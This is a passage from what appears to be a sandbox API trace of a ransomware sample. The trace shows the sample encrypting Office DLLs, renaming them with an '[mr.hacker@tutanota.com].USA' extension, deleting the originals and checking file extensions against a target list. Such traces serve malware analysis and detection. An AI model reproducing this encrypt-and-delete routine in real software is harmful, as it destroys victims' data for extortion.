Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.775] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.775] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.776] GetLastError () returned 0x0 [0057.776] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x25b50, lpOverlapped=0x0) returned 1 [0057.779] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x25b60, lpOverlapped=0x0) returned 1 [0057.782] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.782] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.783] SetEndOfFile (hFile=0x1f0) returned 1 [0057.783] CloseHandle (hObject=0x1f0) returned 1 [0057.783] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.783] SetEndOfFile (hFile=0x240) returned 1 [0057.784] CloseHandle (hObject=0x240) returned 1 [0057.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.785] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 1 [0057.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.785] lstrlenW (lpString=".doc") returned 4 [0057.785] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString=".docx") returned 5 [0057.785] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.785] lstrlenW (lpString=".pdf") returned 4 [0057.785] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString=".xls") returned 4 [0057.785] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString=".xlsx") returned 5 [0057.785] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.785] lstrlenW (lpString=".ppt") returned 4 [0057.785] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.785] lstrlenW (lpString=".zip") returned 4 [0057.785] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString=".rar") returned 4 [0057.785] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.785] lstrlenW (lpString=".bz2") returned 4 [0057.785] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.785] lstrlenW (lpString=".7z") returned 3 [0057.785] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.785] lstrlenW (lpString=".dbf") returned 4 [0057.786] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString=".1cd") returned 4 [0057.786] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString=".jpg") returned 4 [0057.786] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString=".doc") returned 4 [0057.786] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString=".docx") returned 5 [0057.786] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.786] lstrlenW (lpString=".pdf") returned 4 [0057.786] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString=".xls") returned 4 [0057.786] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString=".xlsx") returned 5 [0057.786] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.786] lstrlenW (lpString=".ppt") returned 4 [0057.786] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString=".zip") returned 4 [0057.786] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString=".rar") returned 4 [0057.786] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.786] lstrlenW (lpString=".bz2") returned 4 [0057.786] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.786] lstrlenW (lpString=".7z") returned 3 [0057.786] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.786] lstrlenW (lpString=".dbf") returned 4 [0057.787] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.787] lstrlenW (lpString=".1cd") returned 4 [0057.787] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0057.787] lstrlenW (lpString=".jpg") returned 4 [0057.787] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.787] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.787] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0057.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.787] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=2528128) returned 1 [0057.787] CloseHandle (hObject=0x240) returned 1 [0057.788] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll")) returned 0x20 [0057.788] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.788] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0057.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0057.788] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0057.788] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0057.789] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0057.796] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0057.796] ReadFile (in: hFile=0x240, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0057.805] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0057.805] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0057.805] ReadFile (in: hFile=0x240, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.160] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.160] WriteFile (in: hFile=0x240, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0058.177] SetEndOfFile (hFile=0x240) returned 1 [0058.976] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f30068 [0059.016] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.016] WriteFile (in: hFile=0x240, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.018] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.018] WriteFile (in: hFile=0x240, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.023] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.023] WriteFile (in: hFile=0x240, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.025] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f30068 | out: hHeap=0x5d0000) returned 1 [0059.025] CloseHandle (hObject=0x240) returned 1 [0059.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.026] lstrlenW (lpString=".doc") returned 4 [0059.026] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString=".docx") returned 5 [0059.026] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0059.026] lstrlenW (lpString=".pdf") returned 4 [0059.026] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString=".xls") returned 4 [0059.026] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString=".xlsx") returned 5 [0059.026] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0059.026] lstrlenW (lpString=".ppt") returned 4 [0059.026] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.026] lstrlenW (lpString=".zip") returned 4 [0059.026] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString=".rar") returned 4 [0059.026] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.026] lstrlenW (lpString=".bz2") returned 4 [0059.026] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.026] lstrlenW (lpString=".7z") returned 3 [0059.026] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.026] lstrlenW (lpString=".dbf") returned 4 [0059.026] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.026] lstrlenW (lpString=".1cd") returned 4 [0059.026] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".jpg") returned 4 [0059.027] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".doc") returned 4 [0059.027] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString=".docx") returned 5 [0059.027] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0059.027] lstrlenW (lpString=".pdf") returned 4 [0059.027] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString=".xls") returned 4 [0059.027] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString=".xlsx") returned 5 [0059.027] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0059.027] lstrlenW (lpString=".ppt") returned 4 [0059.027] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".zip") returned 4 [0059.027] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString=".rar") returned 4 [0059.027] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.027] lstrlenW (lpString=".bz2") returned 4 [0059.027] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.027] lstrlenW (lpString=".7z") returned 3 [0059.027] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".dbf") returned 4 [0059.027] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".1cd") returned 4 [0059.027] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0059.027] lstrlenW (lpString=".jpg") returned 4 [0059.027] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.028] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.028] lstrlenW (lpString="ACEEXCH.DLL") returned 11 [0059.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0059.028] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=442272) returned 1 [0059.028] CloseHandle (hObject=0x240) returned 1 [0059.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 0x20 [0059.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0059.028] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.028] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0059.029] GetLastError () returned 0x0 [0059.029] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x6bfa0, lpOverlapped=0x0) returned 1 [0059.048] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x6bfb0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x6bfb0, lpOverlapped=0x0) returned 1 [0059.055] ReadFile (in: hFile=0x240, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.055] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xea, lpOverlapped=0x0) returned 1 [0059.055] SetEndOfFile (hFile=0x1ec) returned 1 [0059.055] CloseHandle (hObject=0x1ec) returned 1 [0059.055] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.056] SetEndOfFile (hFile=0x240) returned 1 [0059.059] CloseHandle (hObject=0x240) returned 1 [0059.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.059] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 1 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString=".doc") returned 4 [0059.060] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString=".docx") returned 5 [0059.060] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0059.060] lstrlenW (lpString=".pdf") returned 4 [0059.060] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString=".xls") returned 4 [0059.060] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString=".xlsx") returned 5 [0059.060] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0059.060] lstrlenW (lpString=".ppt") returned 4 [0059.060] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString=".zip") returned 4 [0059.060] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString=".rar") returned 4 [0059.060] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.060] lstrlenW (lpString=".bz2") returned 4 [0059.060] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.060] lstrlenW (lpString=".7z") returned 3 [0059.060] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString=".dbf") returned 4 [0059.060] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString=".1cd") returned 4 [0059.060] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.060] lstrlenW (lpString=".jpg") returned 4 [0059.060] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.976] lstrlenW (lpString=".doc") returned 4 [0059.976] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString=".docx") returned 5 [0059.984] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0059.984] lstrlenW (lpString=".pdf") returned 4 [0059.984] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString=".xls") returned 4 [0059.984] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString=".xlsx") returned 5 [0059.984] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0059.984] lstrlenW (lpString=".ppt") returned 4 [0059.984] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.984] lstrlenW (lpString=".zip") returned 4 [0059.984] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString=".rar") returned 4 [0059.984] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.984] lstrlenW (lpString=".bz2") returned 4 [0059.984] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.984] lstrlenW (lpString=".7z") returned 3 [0059.984] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.984] lstrlenW (lpString=".dbf") returned 4 [0059.984] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 